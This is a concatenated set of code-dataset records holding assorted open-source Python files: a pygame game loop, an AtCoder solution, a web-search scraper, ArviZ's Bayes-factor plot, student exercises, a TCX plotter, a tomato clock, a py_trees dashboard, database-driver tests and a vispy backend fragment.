once\n save_screen = screen.copy() # save_screen holds a copy of the screen once the player dies, used to create a glitchy bg\n animations_dictionary['death'] = e.create_death_screen(10,pygame.transform.flip(char_frame_to_display,char_animation_flip,False)) # func returns a death animation list given the char's current frame\n char_current_animation, char_current_frame = change_animation(char_current_animation,char_current_frame,'death',False) # change animation to 'death' so this death animation plays out, change frame number to 0\n char_animation_lock = True # character can no longer change animation once they die\n\n char_shadow = pygame.transform.scale(char_shadow,(character_feet_shadow.w,character_feet_shadow.h)) # actual image of shadow, scale it to the dimensions of character_feet_shadow Rect\n\n if display_shadow: # if True, the shadow will display\n screen.blit(char_shadow,character_feet_shadow)\n\n char_current_frame += 1 # increase character's current frame by 1\n\n if char_current_frame >= len(animations_dictionary[char_current_animation]) and char_current_animation != 'jump': # if the current frame is equal to the list length, reset it to 0\n char_current_frame = 0\n if char_current_animation == 'death': # if the character is dying, create the glitch screen animation using save_screen which holds a copy of the screen before the char died\n animations_dictionary['screen_glitch'] = e.create_glitch_screen(save_screen,20)\n\n if char_current_animation == 'jump' and char_current_frame >= len(animations_dictionary['jump']): # freeze char frame number at the last index of the jump animation\n char_current_frame = len(animations_dictionary['jump']) - 1\n\n if char_current_animation != 'death': # if animation is not death, display frame depending on char_frame_name\n char_frame_name = animations_dictionary[char_current_animation][char_current_frame] # find frame name depending on char current animation and current frame\n char_frame_to_display = animation_frame_surfaces[char_frame_name] # save the actual Surface to be displayed based on the frame name above\n else:\n char_frame_to_display = animations_dictionary['death'][char_current_frame] # if animation is death, the Surfaces themselves are already located within the dictionary\n\n screen.blit(pygame.transform.flip(char_scythe,char_animation_flip, False), (char_x - game_scroll[0] - 15,char_y - game_scroll[1] - 50)) # display the scythe behind the player\n screen.blit(pygame.transform.flip(char_frame_to_display,char_animation_flip,False),(char_x - game_scroll[0],char_y - game_scroll[1])) # display the character // flip to make the character face the right way\n char_loaded = True\n\n # HUD ----------------------------------------------------------------------------#\n # display pixelated border, mana bar, enemy counter, ZONE header\n screen.blit(game_border,(450 - game_border.get_width()//2,300 - game_border.get_height()//2))\n screen.blit(mana_bar, (8, 115))\n mana_bar_fill_bg, mana_bar_fill_sl, mana_bar_fill_fl = e.create_glitch_effect(int(char_mana*0.8), height=8)\n mana_bar_fill_bg.set_alpha(150)\n screen.blit(mana_bar_fill_bg, (13, 135))\n screen.blit(mana_bar_fill_sl, (13, 135))\n screen.blit(mana_bar_fill_fl, (13, 135))\n screen.blit(enemy_counter_bg, (682, 140))\n screen.blit(enemy_number_text2,enemy_number_text_rect2)\n screen.blit(enemy_number_text,enemy_number_text_rect)\n screen.blit(enemy_counter,(659,120))\n screen.blit(level_header,(450 - level_header.get_width()//2,5))\n if frame_count > 30: # when frame count greater than/less than 30, the colour of the level header changes\n current_level_text = level_font.render('ZONE ' + str(current_level),True,(255,255,255))\n current_level_text2 = level_font.render('ZONE ' + str(current_level),True,(212, 212, 212))\n else:\n current_level_text = level_font.render('ZONE ' + str(current_level),True,(174,135,228))\n current_level_text2 = level_font.render('ZONE ' + str(current_level), True, (221, 203, 245))\n current_level_text_rect = current_level_text.get_rect()\n current_level_text_rect2 = current_level_text2.get_rect()\n current_level_text_rect.center = (450,42)\n current_level_text_rect2.center = (451,43)\n screen.blit(current_level_text2, current_level_text_rect2)\n screen.blit(current_level_text,current_level_text_rect)\n\n # scroll system --------------------------------------------------------------------------------------------#\n # add text to scroll depending on level\n scroll_surf = pygame.Surface((900,600)) # create Surface which matches the size of the screen, this is where the scroll text will be drawn onto\n scroll_surf.set_colorkey((0,0,0)) # make the entire surface transparent (black transparent)\n scroll_rect = pygame.Rect(scroll_obj[0][0] + 160,scroll_obj[0][1] + 60, scroll_surf.get_width() - 600, scroll_surf.get_height()) # create Rect obj which text wraps around\n\n if current_level == 1:\n scroll_text = \"This is how I'll be communicating with you. If you want to view/close this scroll, press 'E'. To cast your basic slash attack, hold down the mouse button and drag the following pattern. Good luck! (note: follow the rainbow.)\"\n m.drawText(scroll_surf,scroll_text,(49, 52, 56),scroll_rect,scroll_font,aa=True,bkg=None) # draw scroll text\n scroll_surf.blit(slash_pic,[scroll_obj[0][0] + 230, scroll_obj[0][1] + 330]) # display a picture of the slash pattern for the tutorial\n elif current_level == 2:\n scroll_text = \"Good job on clearing those blobs. Seems as if they had mutated from some sort of chemical concoction left laying around. Keep moving onward!\"\n m.drawText(scroll_surf,scroll_text,(49, 52, 56),scroll_rect,scroll_font,aa=True,bkg=None)\n elif current_level == 3:\n scroll_text = \"You're moving into much more dangerous territory now. I'll show you another spell that will allow you to cast a much more powerful attack - a thunderbolt. Use it at your own discretion, however! It takes a lot of energy. \"\n m.drawText(scroll_surf, scroll_text, (49, 52, 56), scroll_rect, scroll_font, aa=True, bkg=None)\n scroll_surf.blit(thunder_pic,[scroll_obj[0][0] + 230, scroll_obj[0][1] + 330]) # display a picture of the thunder pattern\n elif current_level == 4:\n scroll_text = \"I've picked up some traces of another mutation... it appears to be what humans call 'televisions'. However, they're no ordinary televisions - they shoot bullets! Those bullets are indestructible, so don't even try destroying them. I'd recommend getting rid of those TVs first, because they are extremely annoying.\"\n m.drawText(scroll_surf, scroll_text, (49, 52, 56), scroll_rect, scroll_font, aa=True, bkg=None)\n elif current_level == 5:\n scroll_text = \"This is the ultimate test. I'm sensing a significantly higher amount of enemies in this location... so give it your all! Those spells are all you're gonna get. I'll see you on the other side!\"\n m.drawText(scroll_surf, scroll_text, (49, 52, 56), scroll_rect, scroll_font, aa=True, bkg=None)\n\n # move scroll on/off the screen\n if scroll_obj[1] and scroll_obj[0][1] >= 100: # if scroll is active and its y position is greater than 100, move it upwards on screen\n scroll_obj[0][1] -= 15\n elif not scroll_obj[1] and scroll_obj[0][1] <= 650: # if scroll is not active and its y pos is less than 650, move it downwards\n scroll_obj[0][1] += 15\n\n screen.blit(scroll,scroll_obj[0]) # blit the scroll to location stored\n screen.blit(scroll_surf,(0,0)) # blit scroll_surf which has all the drawn text on it\n\n # increase character mana\n if char_mana <= 255 and frame_count % 5 == 0: # increase only if mana is not maxed, and if frame count is divisble by 5 so mana doesn't replenish too fast\n char_mana += 1\n\n if animations_dictionary['screen_glitch'] != '': # if no animation is currently stored under 'screen_glitch' key\n screen.blit(save_screen,(0,0))\n screen.blit(animations_dictionary['screen_glitch'][char_current_frame % 3],(0,0)) # blit the screen glitch frame. % 3 used to return a number from 0-2, as the screen_glitch ani. contains only 3 frames\n screen.blit(backdrop,(0,0)) # display a backdrop which is fairly transparent to reduce the visibility of the glitch screen\n screen.blit(game_over_txt, game_over_rect)\n screen.blit(game_over_txt_2,game_over_rect_2)\n\n # detect if level has been finished or level is being retried\n if number_of_enemies == 0 or level_retry:\n level_transition.set_alpha(level_transition_alpha) # set alpha of level_transition surface\n screen.blit(level_transition,(0,0)) # level transition is a white Surface which is used for fade transition\n\n if level_transition_alpha < 400 and not level_fade: # if the alpha is less than 400, increase level transition's alpha value making it more opaque\n level_transition_alpha += 10\n else:\n level_fade = True # once alpha reaches above 400, level has faded out, set level_fade to True\n if level_timer <= 6:\n level_transition_alpha -= 50 # decrease alpha of level_transition once a little time has past, to make the game visible again\n level_timer += 1\n\n if not level_retry: # if the level is not being retried, i.e all enemies have been cleared\n if level_transition_alpha > 150:\n active_bg_col,active_bg_col2 = (175, 216, 222), (220, 239, 242) # set bg colours to 'clean' colours\n active_block,active_tree,active_rock = clean_block,clean_tree,clean_rock # set active assets to clean assets\n\n if level_timer >= 300: # wait approx 5 seconds (300 frames per 5 seconds) before transitioning to new level\n level_transition_alpha += 30 # increase the alpha so that screen grows increasingly white\n if level_transition_alpha >= 255: # once the screen is completely opaque with white, this will execute\n # reset ALL level variables\n current_level += 1\n if current_level == 6:\n game_running = False\n break\n current_map = load_map(current_level)\n game_scroll = [0, 0]\n char_x, char_y = (100, 100)\n char_alive = True\n char_current_animation, char_current_frame, char_animation_lock = 'idle', 0, False\n char_acceleration = 0\n char_jump, char_fall = False, False\n save_screen = None\n animations_dictionary['screen_glitch'], animations_dictionary['death'] = '', ''\n level_transition_alpha = 0\n level_timer = 0\n level_fade = False\n active_enemies = []\n active_tvs = []\n found_tvs = False\n found_enemies, tile_render_states = False, []\n level_retry = False\n found_tiles = False\n char_mana = 255\n level_retry = False\n scroll_obj = [[450 - scroll.get_width()//2,700], True]\n if current_level % 2 == 0:\n active_block, active_tree, active_rock = pink_block, pink_tree, pink_rock\n active_bg_col, active_bg_col2 = (166, 27, 38), (102, 18, 25)\n else:\n active_block, active_tree, active_rock = green_block, green_tree, green_rock\n active_bg_col, active_bg_col2 = (45, 53, 61), (82, 96, 110)\n else: # if level has been retried, not cleared\n if level_timer >= 1:\n # reset variables\n current_map = load_map(current_level)\n found_tiles = False\n game_scroll = [0, 0]\n char_x, char_y = (100, 100)\n char_alive = True\n char_current_animation, char_current_frame, char_animation_lock = 'idle', 0, False\n char_acceleration = 0\n char_jump, char_fall = False, False\n save_screen = None\n animations_dictionary['screen_glitch'], animations_dictionary['death'] = '', ''\n level_transition_alpha = 0\n level_timer = 0\n level_fade = False\n active_enemies = []\n active_tvs = []\n found_tvs = False\n found_enemies = False\n found_tiles = False\n level_retry = False\n char_mana = 255\n scroll_obj = [[450 - scroll.get_width()//2,700], True]\n\n # frame counter code\n frame_count += 1\n if frame_count > 60:\n frame_count = 0\n\n second_frame_count += 1\n if second_frame_count > 300:\n second_frame_count = 0\n\n pygame.display.flip()\n clock.tick(FPS)\n\n# ending screen game loop\nwhile True:\n glitch_bgs = e.create_glitch_effect(900,height=600)\n\n for glitch_bg in glitch_bgs:\n screen.blit(glitch_bg,(0,0))\n\n screen.blit(intro_overlay_surf,(0,0))\n screen.blit(ending_txt,ending_txt_rect)\n screen.blit(ending_txt2,ending_txt_rect2)\n\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n pygame.quit()\n\n clock.tick(60)\n pygame.display.update()\n","repo_name":"thom974/the-green-reaper","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":72490,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"43038421457","text":"def main():\n n, k = map(int, input().split())\n A = list(map(int, input().split()))\n\n def div_up(a, b):\n return (a + b - 1) // b\n\n def check(x):\n # k以下の切断で、全ての長さをx以下にできるか\n # 小いxが来ると、SUM(A)だけ時間がかかってしまいTLE\n # kが10**9オーダーなので、cntを数え上げるのはだめ\n cnt = 0\n for a in A:\n if a > x:\n # aを長さxで切り分ける\n # 切り上げ除算-1\n cnt += div_up(a, x)-1\n return cnt <= k\n\n # 二分探索\n ok = max(A)\n ng = 0\n while ok-ng > 1:\n mid = (ok+ng)//2\n if check(mid):\n ok = mid\n else:\n ng = mid\n # print(mid, check(mid))\n print(ok)\n\n\nmain()\n","repo_name":"batamorphism/coding","sub_path":"Python/AtCoder/old/abc174_e_1123.py","file_name":"abc174_e_1123.py","file_ext":"py","file_size_in_byte":826,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"33068980170","text":"import requests\nfrom bs4 import BeautifulSoup\n\nsearch_content = input(\"Enter search content:\")\nparams = {\"q\": search_content}\nrespond = requests.get(\"https://www.bing.com/search?\", params=params)\nprint(respond.status_code)\n#print(respond.text)\nsoup = BeautifulSoup(respond.text, features=\"html.parser\")\nresult = soup.find(\"ol\",{\"id\":\"b_results\"})\nlinks = result.findAll(\"li\",{\"class\":\"b_algo\"})\n# for item in result:\n# print(item.find(\"a\").attrs['href'])\n# print(links)\nfor item in links:\n item_text = item.find(\"a\").text\n href_text = item.find(\"a\").attrs[\"href\"]\n\n print(item_text)\n print(href_text)","repo_name":"Wardun-Islam/projects","sub_path":"PycharmProjects/Beautiful Soup/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":616,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"70309693814","text":"# Plotting and reporting Bayes Factor given idata, var name, prior distribution and reference value\n# pylint: disable=unbalanced-tuple-unpacking\nimport logging\n\nfrom numpy import interp\n\nfrom ..data.utils import extract\nfrom .plot_utils import get_plotting_function\nfrom ..stats.density_utils import _kde_linear\n\n_log = logging.getLogger(__name__)\n\n\ndef plot_bf(\n idata,\n var_name,\n prior=None,\n ref_val=0,\n colors=(\"C0\", \"C1\"),\n figsize=None,\n textsize=None,\n hist_kwargs=None,\n plot_kwargs=None,\n ax=None,\n backend=None,\n backend_kwargs=None,\n show=None,\n):\n r\"\"\"Approximated Bayes Factor for comparing hypothesis of two nested models.\n\n The Bayes factor is estimated by comparing a model (H1) against a model in which the\n parameter of interest has been restricted to be a point-null (H0). This computation\n assumes the models are nested and thus H0 is a special case of H1.\n\n Notes\n -----\n The bayes Factor is approximated as the Savage-Dickey density ratio\n algorithm presented in [1]_.\n\n Parameters\n -----------\n idata : InferenceData\n Any object that can be converted to an :class:`arviz.InferenceData` object\n Refer to documentation of :func:`arviz.convert_to_dataset` for details.\n var_name : str, optional\n Name of variable we want to test.\n prior : numpy.array, optional\n In case we want to use different prior, for example for sensitivity analysis.\n ref_val : int, default 0\n Point-null for Bayes factor estimation.\n colors : tuple, default ('C0', 'C1')\n Tuple of valid Matplotlib colors. First element for the prior, second for the posterior.\n figsize : (float, float), optional\n Figure size. If `None` it will be defined automatically.\n textsize: float, optional\n Text size scaling factor for labels, titles and lines. If `None` it will be auto\n scaled based on `figsize`.\n plot_kwargs : dicts, optional\n Additional keywords passed to :func:`matplotlib.pyplot.plot`.\n hist_kwargs : dicts, optional\n Additional keywords passed to :func:`arviz.plot_dist`. Only works for discrete variables.\n ax : axes, optional\n :class:`matplotlib.axes.Axes` or :class:`bokeh.plotting.Figure`.\n backend :{\"matplotlib\", \"bokeh\"}, default \"matplotlib\"\n Select plotting backend.\n backend_kwargs : dict, optional\n These are kwargs specific to the backend being used, passed to\n :func:`matplotlib.pyplot.subplots` or :class:`bokeh.plotting.figure`.\n For additional documentation check the plotting method of the backend.\n show : bool, optional\n Call backend show function.\n\n Returns\n -------\n dict : A dictionary with BF10 (Bayes Factor 10 (H1/H0 ratio), and BF01 (H0/H1 ratio).\n axes : matplotlib_axes or bokeh_figure\n\n References\n ----------\n .. [1] Heck, D., 2019. A caveat on the Savage-Dickey density ratio:\n The case of computing Bayes factors for regression parameters.\n\n Examples\n --------\n Moderate evidence indicating that the parameter \"a\" is different from zero.\n\n .. plot::\n :context: close-figs\n\n >>> import numpy as np\n >>> import arviz as az\n >>> idata = az.from_dict(posterior={\"a\":np.random.normal(1, 0.5, 5000)},\n ... prior={\"a\":np.random.normal(0, 1, 5000)})\n >>> az.plot_bf(idata, var_name=\"a\", ref_val=0)\n \"\"\"\n posterior = extract(idata, var_names=var_name).values\n\n if ref_val > posterior.max() or ref_val < posterior.min():\n _log.warning(\n \"The reference value is outside of the posterior. \"\n \"This translate into infinite support for H1, which is most likely an overstatement.\"\n )\n\n if posterior.ndim > 1:\n _log.warning(\"Posterior distribution has {posterior.ndim} dimensions\")\n\n if prior is None:\n prior = extract(idata, var_names=var_name, group=\"prior\").values\n\n if posterior.dtype.kind == \"f\":\n posterior_grid, posterior_pdf = _kde_linear(posterior)\n prior_grid, prior_pdf = _kde_linear(prior)\n posterior_at_ref_val = interp(ref_val, posterior_grid, posterior_pdf)\n prior_at_ref_val = interp(ref_val, prior_grid, prior_pdf)\n\n elif posterior.dtype.kind == \"i\":\n posterior_at_ref_val = (posterior == ref_val).mean()\n prior_at_ref_val = (prior == ref_val).mean()\n\n bf_10 = prior_at_ref_val / posterior_at_ref_val\n bf_01 = 1 / bf_10\n\n bfplot_kwargs = dict(\n ax=ax,\n bf_10=bf_10.item(),\n bf_01=bf_01.item(),\n prior=prior,\n posterior=posterior,\n ref_val=ref_val,\n prior_at_ref_val=prior_at_ref_val,\n posterior_at_ref_val=posterior_at_ref_val,\n var_name=var_name,\n colors=colors,\n figsize=figsize,\n textsize=textsize,\n hist_kwargs=hist_kwargs,\n plot_kwargs=plot_kwargs,\n backend_kwargs=backend_kwargs,\n show=show,\n )\n\n plot = get_plotting_function(\"plot_bf\", \"bfplot\", backend)\n axes = plot(**bfplot_kwargs)\n return {\"BF10\": bf_10, \"BF01\": bf_01}, axes\n","repo_name":"arviz-devs/arviz","sub_path":"arviz/plots/bfplot.py","file_name":"bfplot.py","file_ext":"py","file_size_in_byte":5121,"program_lang":"python","lang":"en","doc_type":"code","stars":1461,"dataset":"github-code","pt":"21"} +{"seq_id":"20727061022","text":"import io\nfrom operator import mod\nimport sys\n\n_INPUT = \"\"\"\\\n4 10\n1\n1\n3\n2 1\n1\n2 3\n3\n1\n2 2\n3\n\n\n\"\"\"\nsys.stdin = io.StringIO(_INPUT)\n\n# ---------------------------------\nn, q = map(int, input().split())\n\nnot_come = set()\nnot_call = list(range(n, 0, -1))\n\ncome_history = set()\n\nfor _ in range(q):\n event = input()\n\n if event.count(\" \") == 0:\n event = int(event)\n if event == 1:\n tmp = not_call.pop()\n not_come.add(tmp)\n elif event == 3:\n # not_come -= come_history\n\n for ans in not_come:\n print(ans)\n break\n\n else:\n event, person = map(int, event.split())\n come_history.add(person)\n not_come.discard(person)\n","repo_name":"makima333/Atcoder-ganbaru","sub_path":"contest/abc294/D.py","file_name":"D.py","file_ext":"py","file_size_in_byte":729,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"73084597812","text":"class stacks:\r\n s=[]\r\n def push(self):\r\n z=[]\r\n n=str(input(\"Enter Student's Name :- \"))\r\n c=str(input(\"Enter Student's Class And Section (Class in Roman Numbers): -\"))\r\n dob=input(\"Enter Student's Date Of Birth (dd/mm//yyyy)(enter slashes too):- \")\r\n z+=[n,c,dob]\r\n stacks.s.append(z)\r\n def display(self):\r\n l=len(stacks.s)\r\n for i in range(l-1,-1,-1):\r\n print (stacks.s[i])\r\n def peek(self):\r\n if (stacks.s==[]):\r\n print(\"stacks Empty\")\r\n else:\r\n print(\"Top Most's Student's Info :- \",stacks.s[-1])\r\na=stacks()\r\nc=\"y\"\r\nwhile(c==\"y\"):\r\n print (\"Enter 1. To PUSH \")\r\n print (\"Enter 2. To POP \")\r\n print (\"Enter 3. To PEEK \")\r\n print (\"Enter 4. To Display \")\r\n print(\"________________________________________________________________\")\r\n choice=int(input(\"Enter Your Choice :- \"))\r\n if (choice==1):\r\n a.push()\r\n elif (choice==2):\r\n if (a.s==[]):\r\n print (\"stacks Empty\")\r\n else:\r\n print (\"Deleted element is : \",a.s.pop())\r\n elif (choice==3):\r\n a.peek()\r\n elif (choice==4):\r\n a.display()\r\n else:\r\n print(\"Wrong Input\")\r\n c=input(\"If You Wanna Continue Enter 'y' :- \")\r\nif c!='y':\r\n print(\"Bye\")\r\n quit\r\n","repo_name":"edwardmasih/Python-School-Level","sub_path":"Class 12/Python Programs/Stacks & Queues/Info OF Student in stacks.py","file_name":"Info OF Student in stacks.py","file_ext":"py","file_size_in_byte":1326,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"2858356826","text":"# Doesn't work\nimport csv\nimport urllib2\nimport json\n\nurl = \"http://www.omdbapi.com/?t=Harry+Potter&r=json&tomatoes=true&type=movie\"\nresponse = urllib2.urlopen(url).read()\ndata = json.loads(response)\n\nfname = 'data.csv'\n\nwith open(fname,'wb') as outf:\n outcsv = csv.writer(outf)\n outcsv.writerows(data)\n","repo_name":"TheChu/books-to-movies","sub_path":"omdb.py","file_name":"omdb.py","file_ext":"py","file_size_in_byte":309,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"22771826777","text":"import tcxparser\nfrom datetime import datetime\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport pandas as pd\n\nplt.xkcd()\n\n#filename = '/home/guancio/Sources/org-fit/data/activity_3016769645.tcx'\n#problems with output from runalyze\n#filename = '/home/guancio/Sources/org-fit/data/7982-Activity_2018-10-29_18-18_4714045.tcx'\n# filename = '/home/guancio/Sources/org-fit/activity_3029988752.tcx'\ntcx_filename = '/home/guancio/Sources/org-fit/data/activity_3129411144.tcx'\ntcx_filename = '/home/guancio/Sources/org-fit/data/activity_3129411414.tcx'\n\nlast_tcx = None\n\nvalue = \"hr\"\n\ndef reset_last():\n global last_tcx\n last_tcx = None\n\ndef parse_tcx(filename):\n global last_tcx\n if last_tcx is not None and last_tcx[\"filename\"] == filename:\n return last_tcx[\"tr\"]\n \n tcx = tcxparser.TCXParser(filename)\n train = {}\n train['activity_type'] = tcx.activity_type\n train['calories'] = tcx.calories\n train['distance_units'] = tcx.distance_units\n train['date'] = tcx.time_values()[0]\n tr = pd.DataFrame({ 'time': [], 'hr' : []})\n t1 = datetime.strptime(tcx.time_values()[0][:-1], \"%Y-%m-%dT%H:%M:%S.%f\")\n for i in range(min(len(tcx.time_values()), len(tcx.hr_values()))):\n t = (datetime.strptime(tcx.time_values()[i][:-1], \"%Y-%m-%dT%H:%M:%S.%f\") - t1).total_seconds()\n tr = tr.append({\"time\" : t,\n \"hr\": tcx.hr_values()[i]},\n ignore_index=True)\n tr[\"duration\"] = -tr[\"time\"].diff(periods=-1)\n last_tcx = {\"filename\": filename, \"tr\": tr}\n\ndef draw_line_graph(tcx_filename, value, filename):\n to_plot = parse_tcx(tcx_filename)\n if to_plot is None:\n return\n to_plot = to_plot.set_index('time')\n fig, ax = plt.subplots(nrows=1, ncols=1)\n ax.plot(to_plot[value])\n plt.legend()\n fig.savefig(filename)\n plt.close(fig)\n return filename\n\ndef draw_histogram(tcx_filename, value, filename):\n to_plot = parse_tcx(tcx_filename)\n if to_plot is None:\n return\n to_plot = to_plot.dropna()\n bins_hr = np.linspace(100, 180, 5) # number of bins in the histograms\n fig, ax = plt.subplots(nrows=1, ncols=1)\n ax.hist(to_plot[value], weights=to_plot[\"duration\"], bins=bins_hr)\n fig.savefig(filename)\n plt.close(fig)\n return filename\n","repo_name":"guancio/org-fit","sub_path":"cli/process_fit.py","file_name":"process_fit.py","file_ext":"py","file_size_in_byte":2289,"program_lang":"python","lang":"en","doc_type":"code","stars":76,"dataset":"github-code","pt":"21"} +{"seq_id":"30467319680","text":"from threading import Timer\nfrom pygame import mixer\nimport time\n\ntomato_count = 0\nstudy_count = 0\nrelax_count = 0\nt0 = Timer(0, None)\n#mixer.init()\n\ndef tomato_clk(msg, starttime):\n global tomato_count, study_count, relax_count, t0\n tomato_count += 1\n if tomato_count < 7:\n if tomato_count % 2 == 0:\n study_count += 1\n print(\"Time to study. <\", study_count, \"> (from tomato clock)\")\n mixer.music.load('sound/tomato_sound_1.mp3')\n mixer.music.play()\n t0 = Timer(16, tomato_clk, ('%d' % (tomato_count), time.time()))\n t0.start()\n else:\n relax_count += 1\n print(\"Time to relax. <\", relax_count, \"> (from tomato clock)\")\n mixer.music.load('sound/tomato_sound_2.mp3')\n mixer.music.play()\n t0 = Timer(14, tomato_clk, ('%d' % (tomato_count), time.time()))\n t0.start()\n elif tomato_count == 7:\n print(\"Tomato clock closed.\")\n mixer.music.load('sound/tomato_sound_3.mp3')\n mixer.music.play()\n \n\ndef start():\n global tomato_count, study_count, relax_count, t0\n tomato_count = 0\n study_count = 1\n relax_count = 0\n t0 = Timer(4, ready)\n t0.start()\n\ndef ready():\n global tomato_count, study_count, relax_count, t0\n print(\"Time to study. <\", study_count, \"> (from tomato clock)\")\n mixer.music.load('sound/tomato_sound_1.mp3')\n mixer.music.play()\n t0 = Timer(16, tomato_clk, ('%d' % (tomato_count), time.time()))\n t0.start()\n\ndef end():\n global t0\n t0.cancel()\n\n","repo_name":"shallwe999/AILP_Pi_source","sub_path":"tomato_clock.py","file_name":"tomato_clock.py","file_ext":"py","file_size_in_byte":1579,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"10600599155","text":"#!/usr/bin/env python\n#\n# License: BSD\n# https://raw.githubusercontent.com/stonier/py_trees/devel/LICENSE\n#\n##############################################################################\n# Documentation\n##############################################################################\n\n\"\"\"\nQt support for the tutorials.\n\"\"\"\n\n##############################################################################\n# Imports\n##############################################################################\n\nimport functools\nimport py_trees_ros\nimport rospy\nimport std_msgs.msg as std_msgs\nimport threading\n\nfrom python_qt_binding.QtCore import Signal, Qt, QTimer, Slot\nfrom python_qt_binding.QtWidgets import QWidget, QPushButton, QGridLayout, QSizePolicy, QLabel\n\n##############################################################################\n# Dashboard\n##############################################################################\n\n\nclass Dashboard(QWidget):\n\n _activate_button_led = Signal(bool)\n _stop_button_led = Signal(bool)\n\n def __init__(self):\n super(Dashboard, self).__init__()\n\n not_latched = False\n # latched = True\n self.publishers = py_trees_ros.utilities.Publishers(\n [\n ('activate', \"~active\", std_msgs.Bool, not_latched, 1),\n ('stop', \"~active\", std_msgs.Bool, not_latched, 1),\n ]\n )\n\n self.activate_push_button = QPushButton(\"Activate\")\n self.activate_push_button.setStyleSheet(\"QPushButton { font-size: 30pt; }\")\n self.activate_push_button.setSizePolicy(QSizePolicy.Expanding, QSizePolicy.Expanding)\n self.activate_push_button.pressed.connect(functools.partial(self.publish_button_message, self.publishers.activate, True))\n\n self.stop_push_button = QPushButton(\"Stop\")\n self.stop_push_button.setStyleSheet(\"QPushButton { font-size: 30pt; }\")\n self.stop_push_button.setSizePolicy(QSizePolicy.Expanding, QSizePolicy.Expanding)\n self.stop_push_button.pressed.connect(functools.partial(self.publish_button_message, self.publishers.stop, False))\n\n self.hbox_layout = QGridLayout(self)\n self.hbox_layout.addWidget(self.activate_push_button)\n self.hbox_layout.addWidget(self.stop_push_button)\n\n self.subscribers = py_trees_ros.utilities.Subscribers(\n [\n (\"report\", \"/tree/report\", std_msgs.String, self.reality_report_callback)\n ]\n )\n\n def publish_button_message(self, publisher, msg):\n publisher.publish(std_msgs.Bool(msg))\n\n def reality_report_callback(self, msg):\n if msg.data == False:\n self.set_activating_color(False)\n self.set_stopping_color(True)\n self.stop_push_button.setEnabled(True)\n elif msg.data == True:\n self.set_activating_color(True)\n self.set_stopping_color(False)\n self.stop_push_button.setEnabled(True)\n else:\n self.set_activating_color(True)\n self.set_stopping_color(False)\n\n def set_stopping_color(self, val):\n if val:\n self.stop_push_button.setStyleSheet(\"QPushButton { font-size: 30pt; background-color: red}\")\n else:\n self.stop_push_button.setStyleSheet(\"QPushButton { font-size: 30pt; }\")\n\n def set_activating_color(self, val):\n if val:\n self.activate_push_button.setStyleSheet(\"QPushButton { font-size: 30pt; background-color: green}\")\n else:\n self.activate_push_button.setStyleSheet(\"QPushButton { font-size: 30pt; }\")\n\n","repo_name":"pirobot/pi-kobuki-git","sub_path":"piko_tasks/src/piko_tasks/qt.py","file_name":"qt.py","file_ext":"py","file_size_in_byte":3574,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"18363051281","text":"import warnings\n\nimport ctds\n\nfrom .base import TestExternalDatabase\n\nclass TestCursorConnection(TestExternalDatabase):\n '''Unit tests related to the Cursor.connection attribute.\n '''\n\n def test___doc__(self):\n self.assertEqual(\n ctds.Cursor.connection.__doc__,\n '''\\\nA reference to the Connection object on which the cursor was created.\n\n:pep:`0249#id28`\n\n:rtype: ctds.Connection\n'''\n )\n\n def test_closed(self):\n with self.connect() as connection:\n cursor = connection.cursor()\n cursor.close()\n with warnings.catch_warnings(record=True) as warns:\n try:\n cursor.connection\n except ctds.InterfaceError:\n pass\n else:\n self.fail('.connection did not fail as expected') # pragma: nocover\n\n self.assertEqual(len(warns), 1)\n self.assertEqual(\n [str(warn.message) for warn in warns],\n ['DB-API extension cursor.connection used'] * len(warns)\n )\n\n def test_connection(self):\n with self.connect() as connection:\n with connection.cursor() as cursor:\n with warnings.catch_warnings(record=True) as warns:\n self.assertEqual(connection, cursor.connection)\n self.assertEqual(len(warns), 1)\n self.assertEqual(\n [str(warn.message) for warn in warns],\n ['DB-API extension cursor.connection used'] * len(warns)\n )\n\n # cursor.connection is read-only\n try:\n cursor.connection = None\n except AttributeError:\n pass\n else:\n self.fail('.connection did not fail as expected') # pragma: nocover\n\n def test_warning_as_error(self):\n with self.connect() as connection:\n with connection.cursor() as cursor:\n with warnings.catch_warnings():\n warnings.simplefilter('error')\n try:\n _ = cursor.connection\n except Warning as warn:\n self.assertEqual('DB-API extension cursor.connection used', str(warn))\n else:\n self.fail('.connection did not fail as expected') # pragma: nocover\n","repo_name":"zillow/ctds","sub_path":"tests/test_cursor_connection.py","file_name":"test_cursor_connection.py","file_ext":"py","file_size_in_byte":2500,"program_lang":"python","lang":"en","doc_type":"code","stars":81,"dataset":"github-code","pt":"21"} +{"seq_id":"73041597173","text":"from __future__ import division\n\nimport atexit\nfrom time import sleep\nimport gc\nimport os\n\nfrom ..base import (BaseApplicationBackend, BaseCanvasBackend,\n BaseTimerBackend)\nfrom ...util import keys, logger\nfrom ...util.ptime import time\nfrom ... import config\n\nUSE_EGL = config['gl_backend'].lower().startswith('es')\n\n\n# -------------------------------------------------------------------- init ---\n\ntry:\n from ...ext import glfw\n\n # Map native keys to vispy keys\n KEYMAP = {\n glfw.GLFW_KEY_LEFT_SHIFT: keys.SHIFT,\n glfw.GLFW_KEY_RIGHT_SHIFT: keys.SHIFT,\n glfw.GLFW_KEY_LEFT_CONTROL: keys.CONTROL,\n glfw.GLFW_KEY_RIGHT_CONTROL: keys.CONTROL,\n glfw.GLFW_KEY_LEFT_ALT: keys.ALT,\n glfw.GLFW_KEY_RIGHT_ALT: keys.ALT,\n glfw.GLFW_KEY_LEFT_SUPER: keys.META,\n glfw.GLFW_KEY_RIGHT_SUPER: keys.META,\n\n glfw.GLFW_KEY_LEFT: 